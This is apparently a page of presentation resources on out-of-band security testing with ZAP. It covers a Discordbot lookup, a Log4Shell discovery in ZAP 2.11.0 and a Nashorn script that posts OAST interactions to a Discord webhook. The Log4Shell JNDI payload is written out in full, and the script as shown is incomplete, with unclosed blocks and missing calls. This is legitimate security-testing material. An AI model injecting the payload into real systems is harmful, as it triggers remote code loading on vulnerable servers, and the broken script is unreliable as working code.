OAST with ZAP - Presentation Resources

Finding Discordbot’s Address

Ever wonder how chat apps display link previews? In this demo, a URL was constructed using an Interactsh payload and pasted into a Discord channel. Soon after, a GET request appeared in ZAP’s OAST Tab and the request had “Discordbot” in it’s User-agent header value.

Discovering Log4Shell in ZAP 2.11.0

A newer version of ZAP was used to discover Log4Shell in ZAP 2.11.0 by injecting a known Log4Shell payload in the apikey parameter of the /JSON/alert/action/deleteAlert/ ZAP API endpoint. The payload used was ${jndi:ldap://{0}/abc} where {0} was replaced by an Interactsh payload obtained from the OAST add-on.

OAST Interaction Discord Notifier

A ZAP script was used to demonstrate the capabilities of OAST request handlers. The script in the demo registered an OAST request handler to send messages to a Discord webhook whenever a new OAST interaction was received.

ZAP Standalone Script Code (Nashorn)

You need a valid Discord Webhook URL for this script to work.

// This script registers an OAST message handler that sends interactions to a Discord webhook.

var Control = Java.type("org.parosproxy.paros.control.Control")
var Model = Java.type("org.parosproxy.paros.model.Model")
var extOast = Control.getSingleton().getExtensionLoader().getExtension("ExtensionOast")
var interactsh = extOast.getInteractshService()
var HttpSender = Java.type("org.parosproxy.paros.network.HttpSender")
var HttpMessage = Java.type("org.parosproxy.paros.network.HttpMessage")
var HttpHeader = Java.type("org.parosproxy.paros.network.HttpHeader")
var HttpRequestHeader = Java.type("org.parosproxy.paros.network.HttpRequestHeader")
var URI = Java.type("org.apache.commons.httpclient.URI")
var discordWebHookUrl = new URI("<Replace with Discord Webhook URL>", true)

function requestHandler(request) {
    var msg = request.getHistoryReference().getHttpMessage()
    var formattedRequestHeader = "```\n" + (msg.getRequestHeader().toString() || "---") + "\n```"
    var formattedRequestBody = "```\n" + (msg.getRequestBody().toString() || "---") + "\n```"
    embed1 = {
        "title": "Interaction",
        "fields": [
            { "name": "Request Header", "value": formattedRequestHeader },
            { "name": "Request Body", "value": formattedRequestBody },
            { "name": "Source", "value": request.getSource() || "---", "inline": true },
            { "name": "Referer", "value": request.getReferer() || "---", "inline": true },
            { "name": "Handler", "value": request.getHandler() || "---", "inline": true }
    var content = ":sparkles: New interaction received.\n"
    var body = { "content": content, "embeds": [embed1] }

    var requestMethod = HttpRequestHeader.POST;
    var msg = new HttpMessage()
    msg.setRequestHeader(new HttpRequestHeader(requestMethod, discordWebHookUrl, HttpHeader.HTTP11));
    msg.getRequestHeader().setHeader(HttpHeader.CONTENT_TYPE, HttpHeader.JSON_CONTENT_TYPE);
    var sender = new HttpSender(Model.getSingleton().getOptionsParam().getConnectionParam(), true, HttpSender.MANUAL_REQUEST_INITIATOR);

print("OAST Discord Notifier registered.")